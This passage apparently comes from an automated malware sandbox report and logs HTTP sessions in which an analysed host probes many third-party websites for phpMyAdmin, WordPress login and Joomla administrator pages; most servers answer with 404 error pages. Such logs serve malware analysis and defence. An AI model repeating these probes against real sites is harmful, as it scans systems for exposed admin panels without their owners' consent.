73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.301594973 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                107192.168.2.6553253.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.428865910 CET228OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.620023012 CET346INHTTP/1.1 410 Gone
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 6c 61 2d 6d 6f 72 61 64 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7<html>9 <head>49 <meta http-equiv='refresh' content='0; url=http://la-morada.com/' />a </head>8</html>0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                108192.168.2.6553943.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.822494984 CET240OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                109192.168.2.65552369.160.38.280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.878307104 CET224OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.038772106 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                110192.168.2.65577781.31.35.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.887316942 CET233OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.081288099 CET425INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                111192.168.2.65595915.197.142.17380
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.937329054 CET231OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: malibusands.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.043364048 CET418INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Length: 125
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: ip-10-123-123-67.ec2.internal
                                                                                                                                                                                                                                                                                                                X-Request-Id: e515b3d4-c8ca-47c7-9f5b-f83da9df6536
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.072690964 CET274OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: malibusands.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://malibusands.net/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.179980993 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Length: 125
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: ip-10-123-122-167.ec2.internal
                                                                                                                                                                                                                                                                                                                X-Request-Id: b53733d3-2b94-402b-9bb6-db13dc2026c7
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                112192.168.2.65553766.96.160.14480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.062589884 CET234OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.173814058 CET1188INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 867
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                Expires: Sat, 02 Dec 2023 01:09:38 GMT
                                                                                                                                                                                                                                                                                                                Age: 1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                113192.168.2.655535188.120.236.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.126353025 CET226OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.333884001 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.333893061 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                114192.168.2.6557503.64.163.5080
